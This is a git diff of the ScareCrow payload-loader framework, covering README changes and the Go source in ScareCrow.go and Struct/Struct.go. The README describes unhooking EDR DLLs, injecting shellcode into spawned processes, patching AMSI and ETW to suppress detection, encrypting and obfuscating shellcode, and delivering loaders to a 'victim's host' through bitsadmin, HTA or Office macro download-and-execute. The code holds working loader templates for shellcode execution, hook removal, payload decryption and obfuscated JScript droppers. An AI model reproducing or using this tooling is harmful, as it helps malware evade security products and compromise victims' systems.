ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory, the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to Write¬Process¬Memory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process. + +This option can be used with any of the loader options. To enable process injection, use the `-injection` ccommand-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path. + ## AMSI & ETW Bypass ScareCrow contains the ability to patch AMSI (Antimalware Scan Interface) and ETW functions, preventing any event from being generated by the process. -AMSI is a Windows native API that allows Windows Defender (or other antimalware products) to interface deep in the Windows operating system and provide enhanced protection, specifically around in-memory-based attacks. AMSI allows security products to better detect malicious indicators and help stop threats. Since AMSI is native to Windows products don't need to "hook" AMSI rather they load the necessary DLL to in order to gain enhanced insight into the process. Because of this ScareCrow loads the AMSI.dll dll and then patches, to ensure that any results from the scanning interface come back clean. Patching AMSI is default in all loaders, if you wish to not patch AMSI use the `-noamsi` command-line option to disable it in your loader. +AMSI is a Windows native API that allows Windows Defender (or other antimalware products) to interface deep in the Windows operating system and provide enhanced protection, specifically around in-memory-based attacks. AMSI allows security products to better detect malicious indicators and help stop threats. Since AMSI is native to Windows, products don't need to "hook" AMSI, rather they load the necessary DLL to gain enhanced insight into the process. Because of this, ScareCrow loads the AMSI.dll DLL and then patches, to ensure that any results from the scanning interface come back clean. Patching AMSI is default in all loaders, if you wish to not patch AMSI use the `-noamsi` command-line option to disable it in your loader. -ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is also a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Patching ETW is now default in all loaders, if you wish to not patch ETW use the `-noetw` command-line option to disable it in your loader. +ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is also a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Patching ETW is now default in all loaders, if you wish to not patch ETW, use the `-noetw` command-line option to disable it in your loader. Currently, these options only work for the parent process, if the `-injection` command-line option is used the primary process will patch AMSI and ETW but the injected process -## Delivery -The deliver command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include: -* Bits – This will generate a bitsadmin command that while download the loader remotely, execute it and remove it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders. -* HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders. -* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders. +## Encryption +Encrypting shellcode is an important technique used to protect it from being detected and analyzed by EDRs and other security products. ScareCrow comes with multiple methods to encrypt shellcode, these include AES, ELZMA, and RC4. -## Custom Attribute Files -While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name. +### AES +AES (Advanced Encryption Standard) is a symmetric encryption algorithm that is widely used to encrypt data. ScareCrow uses AES 256 bit size to encrypt the shellcode. The advantage of using AES to encrypt shellcode is that it provides strong encryption and is widely supported by cryptographic libraries. However, the use of a fixed block size can make it vulnerable to certain attacks, such as the padding oracle attack. +### ELZMA +ELZMA is a compression and encryption algorithm that is often used in malware to obfuscate the code. To encrypt shellcode using ELZMA, the shellcode is first compressed using the ELZMA algorithm. The compressed data is then encrypted using a random key. The encrypted data and the key are then embedded in the exploit code. The advantage of using ELZMA to encrypt shellcode is that it provides both compression and encryption in a single algorithm. This can help to reduce the size of the exploit code and make it more difficult to detect. + + +### RC4 +RC4 is a symmetric encryption algorithm that is often used in malware to encrypt shellcode. It is a stream cipher that can use variable-length keys and is known for its simplicity and speed. + + +## Obfuscate +Using `-obfu` ccommand-line option enables Garbles Literal flag during the compilation process. This replaces any golang library references and strings with a more complex version, that resolves to the same value during run-time. This process takes a longer time to complete, resulting in a larger GO file. Once the file is compiled ScareCrow parses the newly created file, stripping out any GO string-based IOCs. + + + +## Delivery +The delivery command-line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include: +* Bits – This will generate a bitsadmin command that downloads the loader remotely, executes it and removes it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders. +* HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders. +* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders. (Please note that this method may take longer then the default timer depending on how slow the victim's endpoints available resources) -## Hash -Since ScareCrow creates unique loaders that can also be embedded in scripts or other files for delivery, ScareCrow has the ability to provide you the hashes of all artifacts, using the `-sha256`. ## To Do -* Currently only supports x64 payloads * Some older versions of Window's OSes (i.e. Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a version check is built in to ensure stability * Patch ETW and AMSI in Injected processes ## Credit * Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo) * Special thanks to mvdan for developing [Garble](https://github.com/burrowers/garble) +* Special thanks to mvdan for developing [Binject](github.com/Binject/debug/pe) +* Special thanks to modexp's detailed [article]("https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/") + diff --git a/ScareCrow.go b/ScareCrow.go index f188255..4741848 100644 --- a/ScareCrow.go +++ b/ScareCrow.go @@ -6,13 +6,8 @@ import ( "ScareCrow/Utils" "ScareCrow/limelighter" "bytes" - "crypto/aes" - "crypto/cipher" - "encoding/base64" - "encoding/hex" "flag" "fmt" - "io/ioutil" "log" "os" "os/exec" @@ -37,7 +32,14 @@ type FlagOptions struct { sandbox bool sleep bool nosign bool + evasion string path string + obfuscate bool + export string + clone string + KnownDLLs bool + encryptionmode string + exectype string } func options() *FlagOptions { @@ -51,17 +53,24 @@ func options() *FlagOptions { [*] excel - Loads into a hidden Excel process using a JScript loader. [*] msiexec - Loads into MSIexec process using a JScript loader. [*] wscript - Loads into WScript process using a JScript loader.`) - refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)") URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)") CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely: [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel, and Wscript Loaders). [*] hta - Generates a blank hta file containing the loader along with an MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders). [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel, and Wscript Loaders).`) domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ") + exectype := flag.String("Exec", "RtlCopy", `Set the template to execute the shellcode: +[*] RtlCopy - Using RtlCopy to move the shellcode into the allocated address in the current running process by making a Syscall. +[*] ProcessInjection - Process Injection Mode. +[*] NtQueueApcThreadEx - Executes the shellcode by creating an asynchronous procedure call (APC) to a target thread. +[*] VirtualAlloc - Allocates shellcode into the process using custom syscalls in the current running process`) + evasion := flag.String("Evasion", "Disk", `Sets the type of EDR unhooking technique: +[*] Disk - Retrives a clean version of the DLLs ".text" field from files stored on disk. +[*] KnownDLL - Retrives a clean version of the DLLs ".text" field from the KnownDLLs directory in the object namespace. +[*] None - The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.`) password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.") - AMSI := flag.Bool("noamsi", false, "Disables the AMSI patching that prevents AMSI BuffferScanner.") + AMSI := flag.Bool("noamsi", false, "Disables the AMSI patching that prevents AMSI BufferScanner.") ETW := flag.Bool("noetw", false, "Disables the ETW patching that prevents ETW events from being generated.") - Sha := flag.Bool("sha256", false, "Provides the SHA256 value of the loaders (This is useful for tracking)") ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).") configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the default ones.") valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.") @@ -69,8 +78,15 @@ func options() *FlagOptions { sleep := flag.Bool("nosleep", false, `Disables the sleep delay before the loader unhooks and executes the shellcode.`) nosign := flag.Bool("nosign", false, `Disables file signing, making -domain/-valid/-password parameters not required.`) path := flag.String("outpath", "", "The path to put the final Payload/Loader once it's compiled.") + obfuscate := flag.Bool("obfu", false, `Enables Garbles Literal flag replaces golang libray strings with more complex variants, resolving to the same value at run-time. This creates a larger loader and times longer to compile`) + export := flag.String("export", "", "For DLL Loaders Only - Specify an Export function for a loader to have.") + encryptionmode := flag.String("encryptionmode", "ELZMA", `Sets the type of encryption to encrypt the shellcode: + [*] AES - Enables AES 256 encryption. + [*] ELZMA - Enables ELZMA encryption. + [*] RC4 - Enables RC4 encryption.`) + clone := flag.String("clone", "", "Path to the file containing the certificate you want to clone") flag.Parse() - return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, Sha: *Sha, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox, sleep: *sleep, nosign: *nosign, path: *path} + return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, evasion: *evasion, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, exectype: *exectype, ProcessInjection: *ProcessInjection, valid: *valid, sandbox: *sandbox, sleep: *sleep, path: *path, nosign: *nosign, obfuscate: *obfuscate, export: *export, encryptionmode: *encryptionmode, clone: *clone} } func execute(opt *FlagOptions, name string) string { @@ -79,7 +95,6 @@ func execute(opt *FlagOptions, name string) string { var cmd *exec.Cmd if opt.configfile != "" { oldname := name - name = limelighter.FileProperties(name, opt.configfile) cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"") err := cmd.Run() if err != nil { @@ -89,15 +104,29 @@ func execute(opt *FlagOptions, name string) string { name = limelighter.FileProperties(name, opt.configfile) } if opt.LoaderType == "binary" { - cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags", "-w -s -buildid=", "-o", ""+name+".exe") + if opt.obfuscate == true { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-literals", "-seed=random", "build", "-o", ""+name+".exe") + } else { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "go", "build", "-trimpath", "-ldflags=-w -s -buildid=", "-o", ""+name+".exe") + + } } else { cwd, err := os.Getwd() if err != nil { fmt.Println(err) } - cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") + if opt.obfuscate == true { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "-literals", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") + + } else { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") + } + } + if opt.obfuscate == true { + fmt.Println("[*] Compiling Payload with the Garble's literal flag... this will take a while") + } else { + fmt.Println("[*] Compiling Payload") } - fmt.Println("[*] Compiling Payload") var out bytes.Buffer var stderr bytes.Buffer cmd.Stdout = &out @@ -117,8 +146,8 @@ func execute(opt *FlagOptions, name string) string { if opt.nosign == false { limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname) } - if opt.Sha == true { - Utils.Sha256(compiledname) + if opt.clone != "" { + limelighter.Cloner(compiledname, opt.clone) } return name } @@ -146,6 +175,18 @@ func main() { log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command") } + if opt.exectype != "RtlCopy" && opt.exectype != "NtQueueApcThreadEx" && opt.exectype != "ProcessInjection" && opt.exectype != "VirtualAlloc" { + log.Fatal("Error: Invalid execution type, please select one of the allowed types") + } + + if opt.evasion != "Disk" && opt.evasion != "KnownDLL" && opt.evasion != "None" { + log.Fatal("Error: Invalid evasion method, please select one of the allowed") + } + + if opt.encryptionmode != "AES" && opt.encryptionmode != "ELZMA" && opt.encryptionmode != "RC4" { + log.Fatal("Error: Invalid encrpytion type, please select one of the allowed encrpytion types") + } + if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" { log.Fatal("Error: Invalid loader, please select one of the allowed loader types") } @@ -197,35 +238,15 @@ func main() { if opt.ProcessInjection != "" && opt.refresher == true { log.Fatal("Error: Can not use the unmodified option with the process injection loaders") } + if opt.LoaderType != "dll" && opt.export != "" { + log.Fatal("Error: Export option can only be used with DLL loaders ") + } Utils.CheckGarble() - var rawbyte []byte - src, _ := ioutil.ReadFile(opt.inputFile) - dst := make([]byte, hex.EncodedLen(len(src))) - hex.Encode(dst, src) - r := base64.StdEncoding.EncodeToString(dst) - rawbyte = []byte(r) - key := Cryptor.RandomBuffer(32) - iv := Cryptor.RandomBuffer(16) - - block, err := aes.NewCipher(key) - if err != nil { - log.Fatal(err) - } - paddedInput, err := Cryptor.Pkcs7Pad([]byte(rawbyte), aes.BlockSize) - if err != nil { - log.Fatal(err) - } - fmt.Println("[*] Encrypting Shellcode Using AES Encryption") - cipherText := make([]byte, len(paddedInput)) - ciphermode := cipher.NewCBCEncrypter(block, iv) - ciphermode.CryptBlocks(cipherText, paddedInput) - b64ciphertext := base64.StdEncoding.EncodeToString(cipherText) - b64key := base64.StdEncoding.EncodeToString(key) - b64iv := base64.StdEncoding.EncodeToString(iv) + b64ciphertext, b64key, b64iv := Cryptor.EncryptShellcode(opt.inputFile, opt.encryptionmode) fmt.Println("[+] Shellcode Encrypted") - name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection, opt.sleep, opt.AMSI) + name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection, opt.sleep, opt.AMSI, opt.export, opt.encryptionmode, opt.exectype, opt.evasion) name = execute(opt, name) - Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.Sha, opt.path) + Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.path) } diff --git a/Struct/Struct.go b/Struct/Struct.go index 2850d03..6793755 100644 --- a/Struct/Struct.go +++ b/Struct/Struct.go @@ -203,7 +203,6 @@ func JS_Msiexec_Sub() string { func JSfile() string { return ` try { - var {{.Variables.fso}} = new ActiveXObject("Scripti"+"ng.FileSys"+"temObject"); var {{.Variables.dropPath}} = {{.Variables.fso}}.GetSpecialFolder(2); @@ -214,11 +213,10 @@ func JSfile() string { {var {{.Variables.base6411}}decoded={{.Variables.Magic1}}({{.Variables.res1}});var {{.Variables.TextStream11}}=new ActiveXObject('A'+'D'+'O'+'D'+'B'+'.'+'S'+'t'+'r'+'e'+'a'+'m');{{.Variables.TextStream11}}.Type=2;{{.Variables.TextStream11}}.charSet='iso-8859-1';{{.Variables.TextStream11}}.Open();{{.Variables.TextStream11}}.WriteText({{.Variables.base6411}}decoded);var {{.Variables.BinaryStream}}=new ActiveXObject('A'+'D'+'O'+'D'+'B'+'.'+'S'+'t'+'r'+'e'+'a'+'m');{{.Variables.BinaryStream}}.Type=1;{{.Variables.BinaryStream}}.Open();{{.Variables.TextStream11}}.Position=0;{{.Variables.TextStream11}}.CopyTo({{.Variables.BinaryStream}});{{.Variables.BinaryStream}}.SaveToFile({{.Variables.filename1}},2);{{.Variables.BinaryStream}}.Close()} {{.Variables.dll}} - + {{.Variables.binaryWriter}}({{.Variables.dllvar}},{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}"); {{.Variables.Loader}} - }catch(e) { } ` @@ -270,7 +268,7 @@ func Macro() string { func WS_JS() string { return ` - var {{.Variables.manifest}} = ' '; + var {{.Variables.manifest}} = ' '; var {{.Variables.ax}} = new ActiveXObject("Microsoft.Windows.ActCtx"); {{.Variables.ax}}.ManifestText = {{.Variables.manifest}}; @@ -278,7 +276,7 @@ func WS_JS() string { ` } -func Decrypt_Function() string { +func AESDecrypt_Function() string { return ` func {{.Variables.PKCS5UnPadding}}({{.Variables.src}} []byte) []byte { {{.Variables.length}} := len({{.Variables.src}}) @@ -288,10 +286,11 @@ func {{.Variables.PKCS5UnPadding}}({{.Variables.src}} []byte) []byte { func {{.Variables.FuncName}}() []byte { {{.Variables.ciphertext}} - {{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString({{.Variables.fullciphertext}}) - {{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}") - {{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}") + {{.Variables.vciphertext}}, _ := hex.DecodeString({{.Variables.fullciphertext}}) + {{.Variables.vkey}}, _ := hex.DecodeString("{{.Variables.key}}") + {{.Variables.viv}}, _ := hex.DecodeString("{{.Variables.iv}}") + {{.Variables.block}}, _ := aes.NewCipher({{.Variables.vkey}}) @@ -300,223 +299,80 @@ func {{.Variables.FuncName}}() []byte { {{.Variables.mode}}.CryptBlocks({{.Variables.decrypted}}, {{.Variables.vciphertext}}) {{.Variables.stuff}} := {{.Variables.PKCS5UnPadding}}({{.Variables.decrypted}}) - {{.Variables.rawdata}} := (string({{.Variables.stuff}})) - {{.Variables.hexdata}}, _ := base64.StdEncoding.DecodeString({{.Variables.rawdata}}) - {{.Variables.raw_bin}}, _ := hex.DecodeString(string({{.Variables.hexdata}})) - return {{.Variables.raw_bin}} + return {{.Variables.stuff}} } - ` } - -func DLL_Refresher() string { +func RCFDecrypt_Function() string { return ` - package main - - import "C" - - import ( - "debug/pe" - "encoding/base64" - {{.Variables.HEX_Import}} - "[loader]/[loader]" - "io/ioutil" - "strconv" - "syscall" - "unsafe" - {{.Variables.SandboxOS}} - - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" - - ) - - - const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF - ) - var _ unsafe.Pointer - var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} - ) - - - - {{.Variables.Sandboxfunction}} - - func {{.Variables.Versionfunc}}() string { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.SyscallNumberlist}} - - } - - - func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - } - - } - func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} += i - } - return string({{.Variables.decoded}}) - - } - - {{.Variables.WriteProcessMemory_Function}} - - {{.Variables.ETW_Function}} - - {{.Variables.AMSI_Function}} + func {{.Variables.FuncName}}() []byte { + {{.Variables.ciphertext}} + ciphertext, _ := hex.DecodeString({{.Variables.fullciphertext}}) + key, _ := hex.DecodeString("{{.Variables.key}}") - func main() { + cipher, err := rc4.NewCipher(key) + if err != nil { + return nil } - {{.Variables.ExportName}} - + {{.Variables.raw_bin}} := make([]byte, len(ciphertext)) + cipher.XORKeyStream({{.Variables.raw_bin}}, ciphertext) - //export Run - func Run() { - {{.Variables.Sandbox}} - {{.Variables.ETW}} - {{.Variables.AMSI}} - {{.Variables.Version}} := {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() - } - {{.Variables.ETW}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - var {{.Variables.phandle}} uint64 - var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr - {{.Variables.phandle}} = 0xffffffffffffffff - {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) - {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) - {{.Variables.protect}} = 0x40 - {{.Variables.alloctype}} = 0x3000 - {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) - {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) - for x, y := range []byte({{.Variables.raw_bin}}) { - {{.Variables.buff}} [x] = y - } - syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0,) + return {{.Variables.raw_bin}} - } +} + ` +} - func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.handle}} := {{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr +func ELZMADecrypt_Function() string { + return ` + func {{.Variables.FuncName}}() []byte { + {{.Variables.ciphertext}} + var {{.Variables.buff}} bytes.Buffer + {{.Variables.hexdata}}, _ := hex.DecodeString({{.Variables.fullciphertext}}) - [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - 0x40, - &{{.Variables.oldfartcodeperms}}, - ) + {{.Variables.buff2}} := bytes.NewBuffer({{.Variables.hexdata}}) - for i := 0; i < len({{.Variables.bytes}}); i++ { - {{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i)) - {{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}})) - (*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i] - } - [loader].[NtProtectVirtualMemoryprep]( - {{.Variables.customsyscallVP}}, - {{.Variables.handlez}}, - (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), - &{{.Variables.regionsize}}, - 0x20, - &{{.Variables.oldfartcodeperms}}, - ) - return nil + {{.Variables.clear}}, {{.Variables.err}} := xz.NewReader({{.Variables.buff2}}) + if {{.Variables.err}} != nil { + log.Fatalf("NewReader error %s", {{.Variables.err}}) } - -` + io.Copy(&{{.Variables.buff}} , {{.Variables.clear}}) + {{.Variables.raw_bin}} := {{.Variables.buff}}.Bytes() + return {{.Variables.raw_bin}} +} + ` } -func Binary() string { +func Imports() string { return ` - package main + {{.Variables.CPORT}} import ( - "debug/pe" + {{.Variables.debugpeimport}} "encoding/base64" - "time" - "[loader]/[loader]" {{.Variables.HEX_Import}} {{.Variables.DebugImport}} - "io/ioutil" + "[loader]/[loader]" + "strconv" + {{.Variables.fmt}} "syscall" "unsafe" - "strconv" + {{.Variables.Time_Import}} {{.Variables.SandboxOS}} - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" - - ) - - - {{.Variables.Debug}} - - const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF - ) - var _ unsafe.Pointer - var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} + {{.Variables.Windows_Import}} + "golang.org/x/sys/windows/registry" + {{.Variables.AdditionalImports}} ) + ` +} - - {{.Variables.Sandboxfunction}} - +func Console() string { + return ` func {{.Variables.Console}}(show bool) { {{.Variables.getWin}} := syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.GetConsoleWindowName}}")) @@ -533,20 +389,57 @@ func Binary() string { {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_HIDE}}) } } + +` +} + +func Header() string { + return ` + package main + + {{.Variables.Imports}} + + + const ( + {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF + ) + var _ unsafe.Pointer + var ( + {{.Variables.customsyscall}} uint16 + {{.Variables.customsyscallVP}} uint16 + {{.Variables.number}} int = {{.Variables.b64number}} + ) + + {{.Variables.Debug}} + + {{.Variables.Sandboxfunction}} func {{.Variables.Versionfunc}}() string { {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") {{.Variables.MV}}, _, err 